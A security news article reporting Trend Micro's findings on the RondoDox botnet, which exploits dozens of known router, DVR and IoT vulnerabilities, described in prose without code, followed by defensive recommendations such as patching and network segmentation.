RondoDox: From Pwn2Own Vulnerabilities to Global Exploitation

Security researchers from Trend Micro uncovered a rapidly expanding botnet operation known as RondoDox. 

The campaign has exploited more than 50 vulnerabilities across over 30 vendors, leveraging both newly discovered and previously demonstrated flaws from Pwn2Own security contests. 

The widespread use of RondoDox highlights the growing danger of automated network exploitation targeting routers, digital video recorders (DVRs), network video recorders (NVRs), and other internet-connected devices.

Weaponizing known vulnerabilities for botnet expansion

The first traces of RondoDox activity appeared in June 2025, when Trend Micro telemetry detected an attack leveraging CVE-2023-1389, which is a vulnerability in the TP-Link Archer AX21 Wi-Fi router. 

This flaw, involving an authentication bypass and command injection via the router’s WAN interface, had been responsibly disclosed and patched in 2023. However, RondoDox operators weaponized it to compromise internet-facing routers that remained unpatched.

This marks a recurring trend in threat activity: vulnerabilities revealed in security competitions quickly transition from theoretical demonstrations to active exploitation in the wild. 

Despite efforts to patch these flaws, the gap between disclosure and mass exploitation continues to narrow, providing botnet operators with a recurring stream of reliable attack vectors.

A stealthy botnet built to infect everything

RondoDox surfaced as a stealthy botnet campaign focusing on command-injection vulnerabilities across a wide range of devices, including routers, DVRs, NVRs, CCTV systems, and web servers. 

The malware’s primary objective is to gain shell access, execute remote commands, and drop multiarchitecture payloads.

Initial investigations by FortiGuard Labs linked RondoDox to early attacks against TBK DVRs and Four-Faith routers, exploiting CVE-2024-3721 and CVE-2024-12856. 

The campaign has since expanded significantly, employing a “loader-as-a-service” model that bundles RondoDox with well-known malware families such as Mirai and Morte. This hybridized infrastructure has enabled widespread distribution and made detection more complex.

The exploit shotgun approach

Unlike earlier, narrowly focused botnets, RondoDox uses what researchers call an “exploit shotgun” method—simultaneously firing off multiple exploits to compromise as many targets as possible. 

Its arsenal now includes dozens of CVEs affecting routers, cameras, web servers, and IoT devices from over 30 manufacturers. By casting a wide net, RondoDox maximizes infection rates and persistence across diverse environments.

Among the most heavily targeted vulnerabilities are CVE-2023-1389, CVE-2024-3721, and CVE-2024-12856.

This designation underscores their critical nature and the need for immediate patching.

RondoDox’s payload delivery follows a multi-stage process: initial exploitation of a device’s management interface, remote command execution, payload download, and system registration within the botnet. 

Once compromised, infected devices are used for data exfiltration, denial-of-service (DoS) attacks, or as launchpads for lateral movement within enterprise networks.

The vulnerability lifecycle

The RondoDox campaign reveals a critical weakness in global vulnerability management. Even with responsible disclosure and vendor patching, many organizations delay applying updates—leaving devices exposed for months or even years. 

The rapid reuse of Pwn2Own-discovered vulnerabilities demonstrates how quickly research findings can be weaponized when patch adoption lags behind.

With the growing integration of artificial intelligence into cyber operations, attackers can now automate vulnerability scanning, exploit development, and payload distribution—dramatically accelerating the time from CVE disclosure to real-world exploitation.

Furthermore, the campaign underscores the persistence of n-day exploits—attacks leveraging publicly known flaws rather than zero-days. 

As long as unpatched infrastructure remains online, botnets like RondoDox will continue to expand their reach and evolve their methods.

Strengthening organizational security posture

To combat RondoDox and similar campaigns, organizations must adopt a proactive and layered defense strategy. Key mitigations include:

• Prioritize patching and visibility: Keep an updated asset inventory and quickly patch all high-risk vulnerabilities, including those in the CISA KEV catalog.
• Strengthen network and access controls: Segment systems, enforce least privilege, use MFA, and limit internet exposure.
• Enhance monitoring and response: Continuously detect anomalies, use threat intelligence, and maintain tested backups for rapid recovery.
• Promote security culture and hygiene: Harden configurations, remove default credentials, and train users to recognize and prevent threats.

Together, these measures create a layered defense that reduces exposure, limits attacker movement, and strengthens organizational resilience against evolving threats.

By exploiting over 50 vulnerabilities across multiple vendors, the RondoDox campaign demonstrates the growing speed and scale of modern exploit operations. 

As attackers increasingly automate discovery and weaponization through AI and large-scale infrastructure, the window between vulnerability disclosure and exploitation continues to shrink. 

Defending against threats like RondoDox requires constant vigilance, rapid patching, and a proactive commitment to securing every layer of the network.